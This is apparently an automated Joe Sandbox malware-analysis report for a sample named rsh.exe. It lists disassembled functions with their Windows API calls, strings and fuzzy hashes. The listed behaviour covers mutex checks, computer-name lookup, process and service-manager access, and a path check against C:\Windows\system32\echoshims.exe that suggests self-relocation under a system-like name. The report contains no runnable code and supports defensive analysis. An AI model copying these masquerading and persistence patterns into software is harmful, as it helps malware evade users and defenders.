Opcode ID: 8c4ba4b2ea6cbde5f477bcaa4025867715939f21b61f16371310259470fb0b3f
Instruction ID: 19cf301c58592aee25f499eabce12d2a2046ef9ff4dcfd9c96aa87fb5d784cf8
Opcode Fuzzy Hash: 8c4ba4b2ea6cbde5f477bcaa4025867715939f21b61f16371310259470fb0b3f
Instruction Fuzzy Hash: 9131BA7656C30257D720BFB1BC0D78636D59F20348F194426E818C22A2EF74C8B3CEA2

Uniqueness

Uniqueness Score: 0.01%

Function 0021D057, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52
registryCOMMON

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 0021D073
GetModuleHandleW.KERNEL32(00000000), ref: 0021D0B0
RegisterClassExW.USER32(00000030), ref: 0021D0BD
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0021D0D0
CreateWindowExW.USER32(00000000,?,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 0021D0FF

Strings

0, xrefs: 0021D096

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: HandleModule$ClassCreateRegisterWindow_snwprintf
String ID: 0
API String ID: 1398201921-4108050209
Opcode ID: b1df996d5c213f09e001f896c9e4d0e4ba70528594606a683a33d28a0ff10463
Instruction ID: 6d1952de0366c90a52511aa442b61e87bbdbe4c1326a4b295207961b9129174b
Opcode Fuzzy Hash: b1df996d5c213f09e001f896c9e4d0e4ba70528594606a683a33d28a0ff10463
Instruction Fuzzy Hash: 45116171960218BBEB20ABD0EC19FEE76B8EB04740F204059F705BA281DB7056A5CF69

Uniqueness

Uniqueness Score: 0.03%

Function 0021F574, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 0021F574
GetFileSize.KERNEL32(?,00000000), ref: 0021F583
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0021F58D
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0021F599
CloseHandle.KERNEL32 ref: 0021F5A0
CloseHandle.KERNEL32 ref: 0021F5A8

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 1b7e926b2d9487f4e24a35eb9b9e1c23bb52356aa952bee86ce65e99bb7aadbf
Instruction ID: e026bbf573dab2ac90192c3c386b396b35daab8f51e1ca988f7196b6e9137b57
Opcode Fuzzy Hash: 1b7e926b2d9487f4e24a35eb9b9e1c23bb52356aa952bee86ce65e99bb7aadbf
Instruction Fuzzy Hash: 34E0EC72200601BFE3213FE5FD8CBAE3AA8FB59B03F442165F605D11A0CB644A038F65

Uniqueness

Uniqueness Score: 0.01%

Function 0021103C, Relevance: 7.5, APIs: 5, Instructions: 46
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00211043
_snwprintf.NTDLL ref: 0021107F
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00211099
GetLastError.KERNEL32 ref: 002110A5
CloseHandle.KERNEL32(00000000), ref: 00211111

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess_snwprintf
String ID:
API String ID: 670123879-0
Opcode ID: af42b746d71fa79d175b096737ae512491a965995133b704a98dbeb8b09b61b3
Instruction ID: 76c6c082461e69dd18e593ad286f2502d88391197cece9856b999e5080c4cd80
Opcode Fuzzy Hash: af42b746d71fa79d175b096737ae512491a965995133b704a98dbeb8b09b61b3
Instruction Fuzzy Hash: 5501F771A10105B7DB20EFE0FC897EDB7B5EBA4341F1001A5EB0992141DF714EB58AA2

Uniqueness

Uniqueness Score: 0.01%

Function 0021CCB0, Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 0021CCC3
SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0021CCF6
ResetEvent.KERNEL32 ref: 0021CD0D
ReleaseMutex.KERNEL32 ref: 0021CD1B
CloseHandle.KERNEL32 ref: 0021CD27

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: 0f01b7e3d09fcff0b6f8f84c1526cbc7df05f461a65432ef83c22671972947c6
Instruction ID: dac7365209f1d7d6120e189774a9906bc84df3aa6a9f66395f36e8847ca5c3e6
Opcode Fuzzy Hash: 0f01b7e3d09fcff0b6f8f84c1526cbc7df05f461a65432ef83c22671972947c6
Instruction Fuzzy Hash: 61F0E738690112AADB313FA2BD0DB993AA4AB24351B256231B904D11F5EA1188A2DAA1

Uniqueness

Uniqueness Score: 0.01%

Function 0021D1A3, Relevance: 7.5, APIs: 5, Instructions: 18
windowsynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

TranslateMessage.USER32(?), ref: 0021D174
DispatchMessageW.USER32(?), ref: 0021D17E
WaitForSingleObject.KERNEL32(00000000), ref: 0021D18C
GetMessageW.USER32 ref: 0021D1A3
DestroyWindow.USER32 ref: 0021D1AE

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Message$DestroyDispatchObjectSingleTranslateWaitWindow
String ID:
API String ID: 710846951-0
Opcode ID: 58d85ecba8e946f73fe2ae6c7a4a08554b0ed17a6b35751bba5ef57350d108db
Instruction ID: 3e9b14f9bd8361d10ae118ff0f05c71fbee764af27b8141ae8875610ca227562
Opcode Fuzzy Hash: 58d85ecba8e946f73fe2ae6c7a4a08554b0ed17a6b35751bba5ef57350d108db
Instruction Fuzzy Hash: 9CE0B671914A15FBEB216BE1FC4CBAD3A79AB04342F24A015F116D1061E7B494A39B14

Uniqueness

Uniqueness Score: 0.03%

Function 0021F5CA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
UNIQUE

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32(?), ref: 0021F5D6
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0021F61D

Strings

`7", xrefs: 0021F5F8
X, xrefs: 0021F665

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: X$`7"
API String ID: 4013585866-3969999246
Opcode ID: 1d0a45594aeb713e6df04ef08be510fb71f9c49eb4026b71374682bb5531a28d
Instruction ID: 493782f830b5d9350ad4453c4a879ba47de772e152591fa07d8b8b93b1c34c92
Opcode Fuzzy Hash: 1d0a45594aeb713e6df04ef08be510fb71f9c49eb4026b71374682bb5531a28d
Instruction Fuzzy Hash: D1115C7096518AAADF60DBA4AF05BEA77ED9F22344F200035E271F10F1D6604DE78B16

Uniqueness

Uniqueness Score: 100.00%

Function 0021F4B3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
fileUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 0021F4FF
DeleteFileW.KERNELBASE(?), ref: 0021F516

Strings

P9", xrefs: 0021F4DA
C:\Windows\system32, xrefs: 0021F4ED

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: DeleteFile_snwprintf
String ID: C:\Windows\system32$P9"
API String ID: 366827715-3127579253
Opcode ID: f0284a1aac4ba682781a8899f9c2165018413af16e5931cf19254d8518577bf8
Instruction ID: 8c315d1e4006b9eb47fa0cf7d0ebaccf0b495c951c30aad2aaf0fdcf35054bc7
Opcode Fuzzy Hash: f0284a1aac4ba682781a8899f9c2165018413af16e5931cf19254d8518577bf8
Instruction Fuzzy Hash: 8FF082B2A1016867CB20F7A0AC59AEE72A99B55300F0006E5FA5697242DE744AF14FD9

Uniqueness

Uniqueness Score: 100.00%

Function 00211321, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
fileUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 00211342
DeleteFileW.KERNELBASE(?), ref: 00211359

Strings

C:\Windows\system32\echoshims.exe, xrefs: 00211336

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: DeleteFile_snwprintf
String ID: C:\Windows\system32\echoshims.exe
API String ID: 366827715-1940308918
Opcode ID: c155748596d85330bafd6f7d4b220b894e30ab5de649266d4f5c2c3afc344e34
Instruction ID: 13c2d1976d0c10fbf500de7cde53a7c746b142fdabf9497aa1608abd93eeeab9
Opcode Fuzzy Hash: c155748596d85330bafd6f7d4b220b894e30ab5de649266d4f5c2c3afc344e34
Instruction Fuzzy Hash: 7DD0C2B191012867CA20BBE07C0D9EB726CDB09310F0006D1F64A97002DA3046B04AD1

Uniqueness

Uniqueness Score: 100.00%

Function 0021F840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
UNIQUE

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32 ref: 0021F840
GetTempFileNameW.KERNEL32(?,?,?,?), ref: 0021F850

Strings

C:\Windows\system32\echoshims.exe, xrefs: 0021F85C

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: C:\Windows\system32\echoshims.exe
API String ID: 3285503233-1940308918
Opcode ID: e9b465f6ca6adee76523c4dbf7c8b1ec8a7df5fc8742f9b64c1b731ac2cae734
Instruction ID: 02036360495c90c727102d71dbf3c8bce18d702525561a1cdbe945cfd58ebf24
Opcode Fuzzy Hash: e9b465f6ca6adee76523c4dbf7c8b1ec8a7df5fc8742f9b64c1b731ac2cae734
Instruction Fuzzy Hash: 61D0127062522967CA206BE06C0D9FBB76CDB15391B0015E1BA19D2111DE3489B18BA1

Uniqueness

Uniqueness Score: 100.00%

Function 0021FAE0, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 24stringUNIQUE

APIs

lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\rsh.exe,C:\Windows\system32\echoshims.exe,?,0021CEE7), ref: 0021FB13

Strings

C:\Windows\system32\echoshims.exe, xrefs: 0021FB09
C:\Users\user\AppData\Local\Temp\rsh.exe, xrefs: 0021FB0E

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: lstrcmpi
String ID: C:\Users\user\AppData\Local\Temp\rsh.exe$C:\Windows\system32\echoshims.exe
API String ID: 1586166983-3779913623
Opcode ID: e0e13c7ffc389c8e6addb6f7441b6822ca9536877a7c2b5017d5354b15c1a198
Instruction ID: 479a8fc89d2c70d131106ac4d1cdd9fd8e2b47b180b61e3add42b3bf6f7097cd
Opcode Fuzzy Hash: e0e13c7ffc389c8e6addb6f7441b6822ca9536877a7c2b5017d5354b15c1a198
Instruction Fuzzy Hash: 90E0DFB423820176CAA0BFF8BB1A3DA21C85B36304F601035F07E81492DE3440F28D26

Uniqueness

Uniqueness Score: 100.00%

Function 001F22CE, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 22stringCOMMON

APIs

lstrcmpW.KERNELBASE ref: 001F22FB

Strings

_E9e3X1YKeRS, xrefs: 001F22E2
ov8oTdn, xrefs: 001F22E9

Memory Dump Source

Source File: 00000013.00000002.1066818448.001F0000.00000040.sdmp, Offset: 001F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1f0000_rsh.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: b1ad1f4d3f7d92402acd1f1916a2e218c8fce37a96e534e3527cab8cb1157e3e
Instruction ID: 8d412d92ea343a2400086fa392a8637639a1a8622dc07749ce5a7fe7958febc8
Opcode Fuzzy Hash: b1ad1f4d3f7d92402acd1f1916a2e218c8fce37a96e534e3527cab8cb1157e3e
Instruction Fuzzy Hash: 7CE092B0A102048BC714EF78EE015747BF0F755304F00806AD6099B360DB3069DACF92

Uniqueness

Uniqueness Score: 0.23%

Function 004015EE, Relevance: 3.1, APIs: 2, Instructions: 97UNIQUE

APIs

GetCommandLineW.KERNEL32 ref: 0040166B
CopyStgMedium.URLMON ref: 004016C7

Part of subcall function 00401284: DdeGetData.USER32(0075CD6D,00000006,00000656,00000656), ref: 004012BC

Part of subcall function 0040131D: DdeAddData.USER32(000650AF,00000002,000003EE,000003EE), ref: 004013C0
Part of subcall function 0040131D: VarI2FromBool.OLEAUT32(0000003F,?), ref: 004013DC
Part of subcall function 0040131D: DosDateTimeToFileTime.KERNEL32(00000018,00000008,?), ref: 004013EF

Memory Dump Source

Source File: 00000013.00000002.1067112680.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1067104402.00400000.00000002.sdmp
Associated: 00000013.00000002.1067123364.00403000.00000002.sdmp
Associated: 00000013.00000002.1067137356.00404000.00000004.sdmp
Associated: 00000013.00000002.1067145581.00407000.00000008.sdmp
Associated: 00000013.00000002.1067162239.00411000.00000008.sdmp
Associated: 00000013.00000002.1067191591.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_rsh.jbxd

Similarity

API ID: DataTime$BoolCommandCopyDateFileFromLineMedium
String ID:
API String ID: 1182197512-0
Opcode ID: f17e0d1137fd999faf79aec72c49c685136f2ad5c933919e30c3c22c139a29bb
Instruction ID: c575c7213bc7019fb58d4953c6d8d6e3d97244438fd44ec58686195249787015
Opcode Fuzzy Hash: f17e0d1137fd999faf79aec72c49c685136f2ad5c933919e30c3c22c139a29bb
Instruction Fuzzy Hash: E83161B0E113059BCB08EFB9D99546EBBF5AB88300F10453EEC05B7394DA3999008B99

Uniqueness

Uniqueness Score: 100.00%

Function 0021CC01, Relevance: 3.0, APIs: 2, Instructions: 33synchronizationCOMMON

APIs

_snwprintf.NTDLL ref: 0021CC1D
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0021CC35

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CreateMutex_snwprintf
String ID:
API String ID: 451050361-0
Opcode ID: 297b224378712ce92e414ea1261ed7d6d2325194d0d5d222f4aca9e175668ac1
Instruction ID: c3049466373032d60e1eceb3e40febd2fa259f4f056bf49108d323360e492d75
Opcode Fuzzy Hash: 297b224378712ce92e414ea1261ed7d6d2325194d0d5d222f4aca9e175668ac1
Instruction Fuzzy Hash: 97E0D8716401156BDB20B7E8BC49BEE37A8EB08300F400169FA0ADB191DA3085218AD9

Uniqueness

Uniqueness Score: 0.01%

Function 0021CBA1, Relevance: 3.0, APIs: 2, Instructions: 33synchronizationCOMMON

APIs

_snwprintf.NTDLL ref: 0021CBBD
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0021CBD5

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CreateMutex_snwprintf
String ID:
API String ID: 451050361-0
Opcode ID: f10dce65b3e0325496c568b227291663165b4926a74ed47a71c506471d64dda1
Instruction ID: 19de9cfaed2032489a34ffe229f04bb2bf27ad633e74c8e634ec019523e68225
Opcode Fuzzy Hash: f10dce65b3e0325496c568b227291663165b4926a74ed47a71c506471d64dda1
Instruction Fuzzy Hash: 50E0D8716001156BDB20B7E8BC49BEE37A8EB08300F400169FA0AEB191DA3085218AE9

Uniqueness

Uniqueness Score: 0.01%

Function 002112BD, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

APIs

memset.NTDLL ref: 002112C4
SHFileOperationW.SHELL32(?), ref: 002112E7

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: FileOperationmemset
String ID:
API String ID: 1721435463-0
Opcode ID: eb86a9c75196a8aa15b458ac321068de88c0016d5894ef9d52b3ee26f8b2a770
Instruction ID: 4d67557794c4c176a0ea2f7cb81c285c1b7a177b414f4ae0fe64aaa3728214b2
Opcode Fuzzy Hash: eb86a9c75196a8aa15b458ac321068de88c0016d5894ef9d52b3ee26f8b2a770
Instruction Fuzzy Hash: 54E01AB0D2021ADBDF209FA5D9087EE7AF8EB84715F104067E515A6240D7B5CA618BA2

Uniqueness

Uniqueness Score: 0.04%

Function 00211C27, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

APIs

Process32FirstW.KERNEL32 ref: 00211C33
CloseHandle.KERNEL32 ref: 00211C71

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseFirstHandleProcess32
String ID:
API String ID: 917458368-0
Opcode ID: 915b6a67154ed5f94fc5190f990000dad5d18aa17a5e154984dab4b8b38dc4bf
Instruction ID: cf17cb6639c8504c0330c3bd2ca6009d6dd5510fadc4cf9dc4da197c5fa8074a
Opcode Fuzzy Hash: 915b6a67154ed5f94fc5190f990000dad5d18aa17a5e154984dab4b8b38dc4bf
Instruction Fuzzy Hash: 1DC08CB0031211BEE3202FB1FC0C7AF7A68FF02300F204081EA1290040CBB48B22CEBA

Uniqueness

Uniqueness Score: 0.01%

Function 0021F55E, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

APIs

CreateFileMappingW.KERNELBASE ref: 0021F55E
CloseHandle.KERNEL32 ref: 0021F5A8

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseCreateFileHandleMapping
String ID:
API String ID: 3834335185-0
Opcode ID: 2c62ec0e788f646e962afd328eefdb9936cd24a09c57dc9366a647ef69f69a0d
Instruction ID: 08afdfffbb357235fb6ac001bc7e2a4a4a8931339f6a0a92391e4c83f978183c
Opcode Fuzzy Hash: 2c62ec0e788f646e962afd328eefdb9936cd24a09c57dc9366a647ef69f69a0d
Instruction Fuzzy Hash: 80B09B36115511A743512B58B50C4DDA652DEE56133551172E512C11146F6085774951

Uniqueness

Uniqueness Score: 0.03%

Function 00211C58, Relevance: 3.0, APIs: 2, Instructions: 7COMMON

APIs

Process32NextW.KERNEL32 ref: 00211C58
CloseHandle.KERNEL32 ref: 00211C71

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseHandleNextProcess32
String ID:
API String ID: 4007157957-0
Opcode ID: 52ca91b31c30c9b059b552d735a614e46f35295b2a4698d095595a7a0a2291f2
Instruction ID: c9ac8ee63096175a7dc6eaa36dc805239e1115a58acc9e937beccedec5f2d95c
Opcode Fuzzy Hash: 52ca91b31c30c9b059b552d735a614e46f35295b2a4698d095595a7a0a2291f2
Instruction Fuzzy Hash: 77B012B0174001E762282FB1FC6C3693A68FD0A7417502156E103C0050DBB0D732DE7B

Uniqueness

Uniqueness Score: 0.01%

Function 0021F2F9, Relevance: 3.0, APIs: 2, Instructions: 7serviceCOMMON

APIs

OpenSCManagerW.ADVAPI32 ref: 0021F2F9
CloseServiceHandle.ADVAPI32(00000000), ref: 0021F30E

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseHandleManagerOpenService
String ID:
API String ID: 1199824460-0
Opcode ID: 659131021a3cc47a8c86c1ec2d692e9211b58c83777168d63db7de8e971b753d
Instruction ID: 63f85fcbea6783df19b8f143f0712e3d95c6f332a1ac5338efb5536e94f845e8
Opcode Fuzzy Hash: 659131021a3cc47a8c86c1ec2d692e9211b58c83777168d63db7de8e971b753d
Instruction Fuzzy Hash: 7FB092B8240101AFDF60EFA1FD0C3463AA8B710345B112068A829D2462CBB08092CF60

Uniqueness

Uniqueness Score: 0.02%

Function 002117C0, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

APIs

GetProcessHeap.KERNEL32(00000008,?,00216B19), ref: 002117C3
RtlAllocateHeap.NTDLL(00000000,?,00216B19), ref: 002117CA

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: c639be6734310a51275a24d711835b5753d1b4cf52cf7ee9ae45dc7a7a780493
Instruction ID: c095bfc928beee52966eae648a47e08ee950565e774f63e13785a924b0980821
Opcode Fuzzy Hash: c639be6734310a51275a24d711835b5753d1b4cf52cf7ee9ae45dc7a7a780493
Instruction Fuzzy Hash: AFA012F0A001007FDD1437E0BE0DB05351CB754301F4011007145800508D700001C720

Uniqueness

Uniqueness Score: 0.01%

Function 004019EA, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

APIs

GetBinaryTypeW.KERNEL32 ref: 00401A21

Memory Dump Source

Source File: 00000013.00000002.1067112680.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1067104402.00400000.00000002.sdmp
Associated: 00000013.00000002.1067123364.00403000.00000002.sdmp
Associated: 00000013.00000002.1067137356.00404000.00000004.sdmp
Associated: 00000013.00000002.1067145581.00407000.00000008.sdmp
Associated: 00000013.00000002.1067162239.00411000.00000008.sdmp
Associated: 00000013.00000002.1067191591.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_rsh.jbxd

Similarity

API ID: BinaryType
String ID:
API String ID: 3726996659-0
Opcode ID: a1be3c93512184e3a6080b38a14f49bcf61ecb428ce6b272bd89712b81bceaed
Instruction ID: 1ba52eb7034f402c5e48614f0375ca34845c483ce201e9733ae1b727170f87a7
Opcode Fuzzy Hash: a1be3c93512184e3a6080b38a14f49bcf61ecb428ce6b272bd89712b81bceaed
Instruction Fuzzy Hash: C821F2B0E012198FCB44DFB4C9917AEBBF0BB48300F10456ED419E77D0E7799A819B85

Uniqueness

Uniqueness Score: 0.18%

Function 0021CB35, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

APIs

GetWindowsDirectoryW.KERNEL32 ref: 0021CB35

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: DirectoryWindows
String ID:
API String ID: 3619848164-0
Opcode ID: ed5771336a661f14ced9d7a59c5b04886836e2c3a9d15a520d3f6833fe7e339f
Instruction ID: 43c2c89de70f9d183fd1ea61a53af2223dbb103414e5f09d6a16fc808565416d
Opcode Fuzzy Hash: ed5771336a661f14ced9d7a59c5b04886836e2c3a9d15a520d3f6833fe7e339f
Instruction Fuzzy Hash: 0ED01225DAD1198ADB305F90E84B3B173F4E721319F1441D6C80DC7050EBB14EF086D1

Uniqueness

Uniqueness Score: 0.02%

Function 0021F290, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

APIs

ExitProcess.KERNEL32 ref: 0021F2B0

